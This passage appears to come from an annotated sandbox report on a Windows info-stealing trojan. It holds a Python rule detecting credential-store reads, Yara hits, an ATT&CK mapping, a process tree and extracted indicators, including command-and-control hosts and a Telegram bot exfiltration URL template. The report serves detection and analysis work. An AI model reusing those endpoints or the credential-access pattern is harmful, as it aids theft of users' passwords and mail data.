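    """Return an Alert when an unexpected process touches a credential store."""
    if BROWSER_STORE_RE.search(target):
        kind = "browser credential/history store"
    elif MAIL_STORE_RE.search(target):
        kind = "mail-client profile"
    else:
        return None  # not a store we care about
    image = PureWindowsPath(process).name.lower()
    if image in EXPECTED_READERS:
        return None  # the owning application reading its own data
    reasons = [kind, f"reader {image} is not an expected owner"]
    if USER_WRITABLE_RE.search(process):
        reasons.append("reader runs from a user-writable directory")
    return Alert(process, target, reasons)


def find_credential_access(events: List[Tuple[str, str]]) -> List[Alert]:
    """Run classify_access over (process, target) records and collect alerts."""
    alerts = []
    for process, target in events:
        alert = classify_access(process, target)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample: the report's zDAKFK.exe accesses plus two benign records.
DROPPER = r"C:\Users\user\AppData\Roaming\zDAKFK.exe"
CHROME_PROFILE = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
EDGE_PROFILE = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"
SAMPLE_EVENTS = [
    (DROPPER, CHROME_PROFILE + r"\History"),
    (DROPPER, CHROME_PROFILE + r"\Network\Cookies"),
    (DROPPER, CHROME_PROFILE + r"\Login Data"),
    (DROPPER, EDGE_PROFILE + r"\Login Data"),
    (DROPPER, EDGE_PROFILE + r"\History"),
    (DROPPER, CHROME_PROFILE + r"\Web Data"),
    (DROPPER, CHROME_PROFILE + r"\Top Sites"),
    (DROPPER, "C:\\Users\\user\\AppData\\Roaming\\PostboxApp\\Profiles\\"),
    (DROPPER, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
              r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    # Constructed benign records: the browser reading its own store, and
    # PowerShell loading a module DLL (as in the volume-information entries).
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe", CHROME_PROFILE + r"\Login Data"),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll"),
]

if __name__ == "__main__":
    for a in find_credential_access(SAMPLE_EVENTS):
        print(f"{PureWindowsPath(a.process).name} -> {a.target}: {'; '.join(a.reasons)}")
```

The allowlist is the weak point of any such rule: a stealer injected into chrome.exe would pass it, so in production the reader's image path (not just its name) and its parent process should feed the decision as well.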

Remote Access Functionality

Source: Yara match | File source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7556, type: MEMORYSTR

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
MITRE ATT&CK Matrix

The matrix is flattened on the page; it is rebuilt here one tactic per line, keeping the top-to-bottom order of the cells. A number in front of a technique is the badge printed in that cell and marks a technique this sample's signatures were mapped to; techniques without a badge are the matrix's unmatched template cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Query Registry; 121 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior graph legend (icon meanings, image not reproduced): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet.
Behavior Graph (ID: 1550765; sample: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; start date: 07/11/2024; architecture: WINDOWS; score: 100). The graph is rendered on the page as an image; its node and edge text is rebuilt below as a tree.

Root-level network nodes: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (signature: Uses the Telegram API (likely for C&C communication)); 4 other IPs or domains
Root-level signatures: Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 9 other signatures

SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe (started)
    dropped: C:\Users\user\AppData\Roaming\zDAKFK.exe (PE32); C:\Users\user\...\zDAKFK.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpBE43.tmp (XML); SecuriteInfo.com.W....3030.23832.exe.log (ASCII)
    signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    powershell.exe (started; signature: Loading BitLocker PowerShell Module)
        conhost.exe (started)
        WmiPrvSE.exe (started)
    powershell.exe (started)
        conhost.exe (started)
    SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe (second instance, started by the parent)
        network: checkip.dyndns.com 193.122.130.0, 49733, 49736, 49765, ORACLE-BMC-31898US, United States
        WerFault.exe (started)
    4 other processes
        conhost.exe (started)
zDAKFK.exe (started; signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file)
    zDAKFK.exe (started)
        network: api.telegram.org 149.154.167.220, 443, 49779, 49780, TELEGRAMRU, United Kingdom
        network: rasextraders.com 205.147.111.116, 2525, 49783, NETMAGIC-APNetmagicDatacenterMumbaiIN, India
        network: reallyfreegeoip.org 188.114.97.3, 443, 49755, 49757, CLOUDFLARENETUS, European Union
        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
    schtasks.exe (started)
        conhost.exe (started)

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | 21% | ReversingLabs | Win32.Trojan.Generic
SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | 22% | Virustotal |
SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\zDAKFK.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\zDAKFK.exe | 21% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\zDAKFK.exe | 22% | Virustotal |
                No Antivirus matches
Source | Detection | Scanner | Label
rasextraders.com | 0% | Virustotal |
mail.rasextraders.com | 0% | Virustotal |
Source | Detection | Scanner | Label
http://www.sakkal.comR: | 0% | Avira URL Cloud | safe
http://rasextraders.com | 0% | Avira URL Cloud | safe
http://mail.rasextraders.com | 0% | Avira URL Cloud | safe
http://mail.rasextraders.com | 0% | Virustotal |
http://rasextraders.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
rasextraders.com | 205.147.111.116 | true | false | | unknown
reallyfreegeoip.org | 188.114.97.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
mail.rasextraders.com | unknown | unknown | true | | unknown
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/173.254.250.79 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/lB | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A73000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A47000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20a | zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.comR: | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731386438.000000000633C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | zDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A42000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://rasextraders.com | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.fonts.com | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1725042592.0000000003532000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1767372699.0000000002752000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/ | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://r11.i.lencr.org/0/ | zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://r11.o.lencr.org0# | zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.19.dr | false | | high
http://checkip.dyndns.org | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail.rasextraders.com | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/173.254.250.79$ | zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?L | zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/173.254.250.794 | zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | zDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmp | false | | high
